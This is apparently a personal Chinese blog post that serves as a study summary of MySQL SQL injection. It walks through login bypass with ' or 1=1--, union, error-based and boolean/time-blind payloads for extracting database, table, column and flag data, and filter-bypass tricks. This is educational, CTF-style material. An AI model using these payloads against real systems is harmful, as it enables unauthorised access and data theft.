<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="sql注入总结, Hexo">
    <meta name="description" content="下边以mysql为例：localhost为数据库的服务器，其中demo，information_schema，mysql等为数据库，在demo数据库下又含有demo，student，users表。如图展示的是users表中的内容，他有7个列">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>sql注入总结 | Hexo</title>
    <link rel="icon" type="image/png" href="/favicon.png">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.0.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Hexo</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Hexo</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/13.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">sql注入总结</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-11-25
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>下边以mysql为例：localhost为数据库的服务器，其中demo，information_schema，mysql等为数据库，在demo数据库下又含有demo，student，users表。如图展示的是users表中的内容，他有7个列，分别为id，name，password…</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/20221125015639.png"></p>
<p><strong>SQL语句</strong></p>
<p>如果要查询users表中名字为wangwu的所有数据，SQL语句的写法应该是：select * from users where name=’wangwu’;</p>
<p>select代表查询，*代表所有数据，from后代表查询的表，where代表查询条件。</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/20221125020538.png"></p>
<p>sql查询交互流程：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125134724360.png" alt="image-20221125134724360"></p>
<p>sql注入原理：</p>
<p>   select * from users where name=’wangwu’; fjwaijfiwajfwafjawh </p>
<p>1.SQL命令可查询、插入、更新、删除等，命令的串接。而以分号字符为不同命令的区别。</p>
<p>2.SQL命令对于传入的字符串参数是用单引号字符所包起来。（但连续2个单引号字符，在SQL数据库中， 则视为字符串中的一个单引号字符）</p>
<p>3.SQL命令中，可以注入注解（连续2个减号字符加空格 – 后的文字为注解，或“/<em>”与“</em>/”所包起来的文字为注解，或#后面为注解）</p>
<p>4.因此，如果在组合SQL的命令字符串时，未针对单引号字符作转义处理的话，将导致该字符变量在填入 命令字符串时，被恶意窜改原本的SQL语法的作用。</p>
<p><strong>原理</strong></p>
<p><strong>and</strong> <strong>且</strong> <strong>or</strong> <strong>或</strong></p>
<p>例：某网站登陆语句为：select * from member where name=’$name’ and pwd=’$pwd’ </p>
<p>正常用户传入name=admin，pwd=123456，语句为</p>
<p>select * from member where name=’admin’ and pwd=’123456’ </p>
<p>若我们传入的$name=’ or 1=1– ，传入$pwd随意，则拼接后的sql语句变成：</p>
<p>select * from member where name=’’ or 1=1– ‘ and pwd=’$pwd’</p>
<p>前面说过– 可以注释后面的部分，因此标红部分被注释。由于任何值or 1=1，因此总能查询得到结果，成功</p>
<p>绕过sql查询，登陆用户。这样登陆使用的用户名和密码被称为<strong>万能密码</strong></p>
<h2 id="注入分类"><a href="#注入分类" class="headerlink" title="注入分类"></a>注入分类</h2><p><strong>注入漏洞根据字段类型不同，一般分为int数值型注入和varchar字符型注入</strong></p>
<p>int数值型注入检测payload</p>
<p>?id=xx and 1=1 </p>
<p>?id=xx and 1=2</p>
<p>两次页面对比若有不同，则表示存在 Int数值型sql注入</p>
<p>varchar字符型注入检测payload</p>
<p>?id=xx’ and ‘1’=’1</p>
<p>?id=xx’ and ‘1’=’2</p>
<p>两次页面对比若有不同，则表示存在 varchar字符型sql注入</p>
<p><strong>注入漏洞根据获取sql语句分类，具有以下几种类型</strong></p>
<p>1、select注入 2、insert注入 3、update注入 4、delete注入</p>
<p><strong>注入漏洞根据获取信息的方式分类，具有以下几种类型</strong></p>
<p>1、联合查询注入</p>
<p>2、报错注入</p>
<p>3、布尔盲注</p>
<p>4、时间盲注</p>
<p>5、堆叠注入</p>
<p>6、DNS log注入</p>
<p>7、宽字节注入</p>
<p>8、二次注入</p>
<p>9、hpf（HTTP Parameter Fragment）</p>
<h3 id="联合查询注入"><a href="#联合查询注入" class="headerlink" title="联合查询注入"></a>联合查询注入</h3><p>1、判断是否存在注入（and 1=1/and 1=2）</p>
<p>2、获取查询列数（order by/union select）</p>
<p>3、获取数据库名称</p>
<p>4、获取数据表名称</p>
<p>5、获取数据列名称</p>
<p>6、获取数据</p>
<p><strong>判断select查询的列数</strong></p>
<p>判断select查询的列数的原因：union用于合并两个或多个select语句的结果集，但需要左右两侧列数一致</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125135338074.png" alt="image-20221125135338074"></p>
<p><strong>判断select查询的列数的方法</strong></p>
<p>1.order by + 列数</p>
<p>当猜测的列数 小于等于 真实查询列数时，页面返回正常；反之，页面不正常</p>
<p>2.union select 1,2,3…,列数</p>
<p>当猜测的列数 等于 真实查询列数时，页面返回正常，反之，页面不正常</p>
<p><strong>获取页面上显示位</strong></p>
<p>显示位：网页上能够显示数据的位置。</p>
<p>例：使用union select 1,2,3,4,5,6进行注入时，若页面上应正常显示数据的位置出现了3和4，则表示3和4是</p>
<p>显示位，可以在3和4的地方写入sql代码，则代码执行结果将在页面上显示</p>
<p><strong>获取数据库名称方式</strong></p>
<p>1、select database() //获取当前数据库的名称</p>
<p>2、select schema_name from information_schema.schemata</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125135615732.png" alt="image-20221125135615732"></p>
<p>information_schema数据库是mysql自带的，它提供了访问数据库元数据的方式。什么是元数据呢？元数 据是关于数据的数据，如数据库名或表名或列名，列的数据类型，或访问权限等。因此，可以利用 informati_schema数据库获取我们想要的信息</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p><strong>报错注入原理</strong></p>
<p>由于页面提供了mysql错误信息，黑客通过sql注入可以让mysql错误信息连同数据一并显示到页面上。</p>
<p><strong>报错注入分类</strong></p>
<p>1、XML语法报错</p>
<p>2、数值溢出报错</p>
<p>3、group by报错</p>
<p><strong>XML语法报错</strong></p>
<p>相关函数：updatexml()、extractvalue()，mysql 5.1.5及以上，最多获取32个字符</p>
<p>报错原因：xpath_expr中出现非xpath语法的字符</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125140619905.png"></p>
<p>UpdateXML(xml_target, xpath_expr, new_xml)</p>
<p>返回替换的XML片段</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125141503997.png" alt="image-20221125141503997"></p>
<p>ExtractValue(xml_frag, xpath_expr)</p>
<p>使用XPath表示法从XML字符串中提取值</p>
<p><strong>数值溢出报错——大整数</strong></p>
<p>mysql 5.5.5以上，5.5.50以下。一次最多获取32个字符</p>
<p>试着对最大数做加法运算，可以看到报错的具体情况</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125141659099.png" alt="image-20221125141659099"></p>
<p>在mysql中，要使用这么大的数，并不需要输入这么长的数字进去，使用按位取反运算运算即可</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125141723203.png" alt="image-20221125141723203"></p>
<p>我们知道，如果一个查询成功返回，则其返回值为0，进行逻辑非运算后可得1，这个值是可以进行数学运算</p>
<p>的。利用这一特性，再结合之前说的溢出报错，就可以进行注入了。</p>
<p>(select (!x-~0) from (select user()x)a)</p>
<p><strong>数值溢出报错——浮点数</strong></p>
<p>同理，浮点数也是存在一定范围的</p>
<p>利用姿势：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125150329630.png" alt="image-20221125150329630"></p>
<p>select exp(~(select*from(select user())x));</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125150311603.png" alt="image-20221125150311603"></p>
<p><strong>group by报错——一步步学习原理</strong></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">select rand();//生成一个0~1的随机数</span><br><span class="line">select floor(rand());//将生成的随机数向下取整，值为固定的0  select floor(rand()*2);//将随机数乘2后再向下取整，值为0或1</span><br><span class="line">select concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2)) from information_schema.tables</span><br><span class="line">where table_schema=database();//这样的格式方便观察，当前数据库中有多少个表就会显示多少条数据</span><br><span class="line">select concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))zz from information_schema.tables</span><br><span class="line">where table_schema=database() group by zz;//进行分组，分为两组：0和1</span><br><span class="line">select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))zz from  information_schema.tables where table_schema=database() group by zz;//计数，由于rand()的不确 定性，有时会报错，有时不会报错（不报错概率更大）</span><br></pre></td></tr></tbody></table></figure>

<p>select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand(0)*2))zz from information_schema.tables where table_schema=database() group by zz;//添加随机因子后，rand(0) 变为确定的序列，若查询结果超过3条，则肯定报错</p>
<p>原因：</p>
<p>Floor(rand()*2);没有随机因子的序列是随机的 Floor(rand(0)*2);得到的序列是固定的 0011101110…</p>
<p><strong>Ascii码表简单理解</strong></p>
<p>在计算机中，我们每一个字符都对应这一个ascii码，在mysql中我们可以把未知的字符转换成ascii码，然后来进行比较确定其值。</p>
<p><a target="_blank" rel="noopener" href="https://baike.baidu.com/item/ASCII/309296?fromtitle=ascii%E7%A0%81&amp;fromid=99077&amp;fr=aladdin">https://baike.baidu.com/item/ASCII/309296?fromtitle=ascii%E7%A0%81&amp;fromid=99077&amp;fr=aladdin</a></p>
<p><strong>布尔盲注原理</strong></p>
<p>之所以称之为布尔盲注，一方面是我们不能得到数据的具体内容，只能单个字符的进行猜测判断；另一方面 根据数据查询返回的页面结果（查询成功与失败页面不同）来判断我们输入的查询语句是否有效，非真即假， 所以称为布尔盲注。</p>
<p>每个字符的判断是将该字符与ascii码的可见字符进行比较，相等时才能得到一个字符。Ascii码表可见字符有</p>
<p>近百个，每个字符都要进行比较，数量庞大，非手工能做到。一般使用自动化脚本或注入工具来进行攻击。</p>
<p><strong>相关函数</strong></p>
<p>substr()、mid() 截取字符串 ascii() 将字符转换为ASCII码 concat() 字符串拼接</p>
<p><strong>函数说明</strong></p>
<p>SUBSTR(str,pos,len) //截取字符串，从第pos位开始，长度为len</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152213745.png" alt="image-20221125152213745"></p>
<p>ASCII(str) //将字符转换为ASCII码，若传入字符串，则只转换首字符</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152223306.png" alt="image-20221125152223306"></p>
<p>CONCAT(str1,str2,…) //将多个字符串拼接起来</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152229281.png" alt="image-20221125152229281"></p>
<p><strong>布尔盲注payload</strong></p>
<p>select ascii(substr(concat(‘abc’,’def’),4,1)); //将abc与def字符串拼接到一起后得到第四个字符的ascii码</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152257829.png" alt="image-20221125152257829"></p>
<p>?id=1’ and ascii(substr(database(),1,1))=99 %23//若数据库名首字符ASCII为99，则页面正常显示</p>
<p><strong>payload举例</strong></p>
<p>拿到数据库名第一个字符的payload</p>
<p>?id=1’and ascii(substr(database(),1,1))=117 and ‘1’=‘1</p>
<p>拿到表名第二个字符的payload</p>
<p>?id=1’and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1))=108 and ‘1’=‘1</p>
<p>拿到列名第三个字符的payload</p>
<p>?id=1’and ascii(substr((select group_concat(column_name) from information_schema.columns</p>
<p>where table_schema=database() and table_name=’flags’),3,1))=97 and ‘1‘=’1</p>
<p>拿到数据第四个字符的payload</p>
<p>?id=1’and ascii(substr((select flag from flags limit 0,1),4,1))=103 and ‘1’=’1</p>
<p><strong>延时盲注原理</strong></p>
<p>之所以称之为延时盲注，一方面是我们不能得到数据的具体内容，只能单个字符的进行猜测判断；另一方面 根据数据查询返回的时间（查询成功数据库休眠n秒，失败则不休眠）来判断我们输入的查询语句是否有效， 所以称为延时盲注。</p>
<p><strong>相关函数</strong></p>
<p>sleep() //数据库休眠指定时间函数</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152447135.png" alt="image-20221125152447135"></p>
<p>benchmark() //重复执行表达式一定次数达到页面返回延时 if(condition,true_statement,false_statement) //依据表达式的真假执行不同的语句</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152453749.png" alt="image-20221125152453749"></p>
<p>if(condition,true_statement,false_statement)//若表达式为真，执行true_statement ；表达式为假， false_statement</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152500665.png" alt="image-20221125152500665"></p>
<p><strong>延时盲注payload</strong></p>
<p>select if(ascii(substr(concat(‘abc’,’def’),4,1))=100,sleep(3),null); //若拼接字符串的第四个字符的ascii码</p>
<p>值为100，数据库休眠3秒，否则不做任何操作</p>
<p><img src="https://cdn.jsdelivr.net/gh/wscyoulin/blogimage@main/img/image-20221125152527857.png" alt="image-20221125152527857"></p>
<p>?id=1’ and if(ascii(substr(database(),1,1))=117,sleep(3),null) %23 //若数据库名第一个字符的ASCII值是 99，则页面休眠3秒</p>
<p><strong>payload举例</strong></p>
<p>拿到数据库名第一个字符的payload</p>
<p>?id=1’and if(ascii(substr(database(),1,1))=117,sleep(1),null) and ‘1’=’1</p>
<p>拿到表名集合第二个字符的payload</p>
<p>?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1))=108,sleep(1),null) and ‘1’=’1</p>
<p>拿到列名集合第三个字符的payload</p>
<p>?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns</p>
<p>where table_schema=database() and table_name=’flags’),3,1))=97,sleep(1),null) and ‘1’=’1</p>
<p>拿到数据第四个字符的payload</p>
<p>?id=1’and if(ascii(substr((select flag from flags limit 0,1),4,1))=103,sleep(1),null) and ‘1’=’1</p>
<h2 id="绕过技巧"><a href="#绕过技巧" class="headerlink" title="绕过技巧"></a>绕过技巧</h2><p>十六进制、ASCII码绕过引号 char</p>
<p><a target="_blank" rel="noopener" href="http://tools.bugscaner.com/text/zifuchuanzhuanhex.html">http://tools.bugscaner.com/text/zifuchuanzhuanhex.html</a></p>
<p>like、in、regex绕过等号：substr(password,1,1) like(‘p’); substr(password,1,1) in(‘p’);</p>
<p>逗号被过滤：select * from (select 1)a join (select 2)b、substr(password from 1 for 1) </p>
<p>空格被过滤：/**/、%0d %0a %0c %0b %a0 %09、+</p>
<p>大小写绕过：unIOn SeLeCt</p>
<p>&amp;&amp;代替and、||代替or、|代替xor、^位异或、～取反、!非 在查询时使用一个不存在的函数就能报错出数据库的名字 </p>
<p>等价函数：</p>
<p>hex() 、 bin() 《 == 》 ascii()； </p>
<p>sleep() 《 == 》 benchmark()； </p>
<p>mid()、substr()《==》substring()</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">youlin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://wscyoulin.github.io/2022/11/25/sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">http://wscyoulin.github.io/2022/11/25/sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">youlin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/11/29/unlink%E5%A4%8D%E4%B9%A0/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/2.jpg" class="responsive-img" alt="unlink复习">
                        
                        <span class="card-title">unlink复习</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-11-29
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            youlin
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/11/19/buu-web/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/12.jpg" class="responsive-img" alt="buu_web（21-xx)">
                        
                        <span class="card-title">buu_web（21-xx)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-11-19
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            youlin
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>



<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2023</span>
            
            <a href="/about" target="_blank">youlin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
